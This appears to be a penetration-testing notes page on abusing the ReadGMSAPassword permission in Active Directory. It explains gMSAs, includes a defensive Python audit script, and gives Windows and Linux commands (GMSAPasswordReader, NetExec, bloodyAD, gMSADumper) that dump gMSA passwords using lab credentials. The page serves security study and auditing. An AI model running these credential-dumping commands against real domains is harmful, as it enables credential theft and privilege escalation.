# ReadGMSAPassword

[Group Managed Service Accounts (gMSAs)](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/group-managed-service-accounts/group-managed-service-accounts/group-managed-service-accounts-overview) are an Active Directory feature that provides a secure and automated way to manage service accounts used by applications and services on Windows systems. Unlike traditional service accounts, gMSAs automatically generate, store, and rotate strong passwords, **eliminating the need for manual password management**.

A gMSA can be associated with a group of authorized hosts, allowing multiple servers or services to use the same account. The domain controller handles password generation and distribution through a secure process, ensuring that only approved systems can retrieve the current password.

Access to use a gMSA is controlled through permissions stored in the `msDS-GroupMSAMembership` attribute, which contains a DACL defining which principals, such as computer accounts or services, are allowed to retrieve the password. If an attacker gains control of a principal that has these rights, they may be able to abuse this access to obtain the gMSA password and potentially escalate privileges.
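One way to audit this attribute from the defensive side, as an added example that is not part of the original page: the Python below parses a raw `msDS-GroupMSAMembership` value (a self-relative security descriptor) and lists the SIDs that hold an allow ACE, so they can be compared with the hosts that are supposed to use the gMSA. The SIDs, the access mask, and all function names are constructed for illustration.

```python
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00

def parse_sid(buf, off):
    """Decode the binary SID at buf[off:] into its S-1-... string form."""
    revision, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from(f"<{count}I", buf, off + 8)
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])

def allowed_principals(sd):
    """Return [(sid, access_mask)] for each allow ACE in the descriptor's DACL."""
    (dacl_off,) = struct.unpack_from("<I", sd, 16)        # OffsetDacl in the 20-byte header
    if dacl_off == 0:
        raise ValueError("security descriptor carries no DACL")
    (ace_count,) = struct.unpack_from("<H", sd, dacl_off + 4)
    found, pos = [], dacl_off + 8                          # ACEs follow the 8-byte ACL header
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, pos)
        if ace_size < 8 or pos + ace_size > len(sd):
            raise ValueError("malformed ACE")
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:            # layout: header, mask, SID
            (mask,) = struct.unpack_from("<I", sd, pos + 4)
            found.append((parse_sid(sd, pos + 8), mask))
        pos += ace_size
    return found

def unexpected_readers(sd, approved_sids):
    """SIDs that hold an allow ACE but are not on the approved list."""
    return [sid for sid, _mask in allowed_principals(sd) if sid not in approved_sids]

# --- Constructed sample data (not taken from a real domain) ---
def _sid_bytes(sid):
    parts = sid.split("-")
    subs = [int(p) for p in parts[3:]]
    head = bytes([int(parts[1]), len(subs)]) + int(parts[2]).to_bytes(6, "big")
    return head + struct.pack(f"<{len(subs)}I", *subs)

def build_sample_sd(sids, mask=0x000F01FF):
    aces = b"".join(struct.pack("<BBHI", 0, 0, 8 + len(_sid_bytes(s)), mask) + _sid_bytes(s) for s in sids)
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(sids), 0) + aces
    header = struct.pack("<BBHIIII", 1, 0, 0x8004, 20 + len(acl), 0, 0, 20)
    return header + acl + _sid_bytes("S-1-5-32-544")     # owner: BUILTIN\Administrators

DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"
APPROVED_HOST, STRAY_USER = f"{DOMAIN}-1104", f"{DOMAIN}-1602"
SAMPLE_SD = build_sample_sd([APPROVED_HOST, STRAY_USER])

if __name__ == "__main__":
    for sid in unexpected_readers(SAMPLE_SD, {APPROVED_HOST}):
        print("not on the approved list:", sid)
```

Any SID it reports that is not one of the intended hosts is a principal whose compromise also exposes the gMSA password.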

## Windows

The gMSA password can be read with [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader).

{% code overflow="wrap" %}

```powershell
.\GMSAPasswordReader.exe --accountname delegator$
```

{% endcode %}

## Linux

The gMSA password can be read from a Linux host using [NetExec](https://github.com/Pennyw0rth/NetExec), [BloodyAD](https://github.com/CravateRouge/bloodyAD), or [gMSADumper](https://github.com/micahvandeusen/gMSADumper).

{% code overflow="wrap" %}

```bash
# NetExec
nxc ldap dc01.marvel.local -u x7331 -p 'Passw0rd123!' -k --gmsa

# BloodyAD
bloodyAD -d marvel.local -u x7331 -p 'Passw0rd123!' --host dc01.marvel.local get object 'delegator$' --attr msDS-ManagedPassword

# gMSADumper
python3 gMSADumper.py -d marvel.local -l 10.10.10.81 -u x7331 -p 'Passw0rd123!'
```

{% endcode %}

For an example using NetExec, see [Rebound](https://x7331.gitbook.io/boxes/boxes/insane/rebound#gmsa).
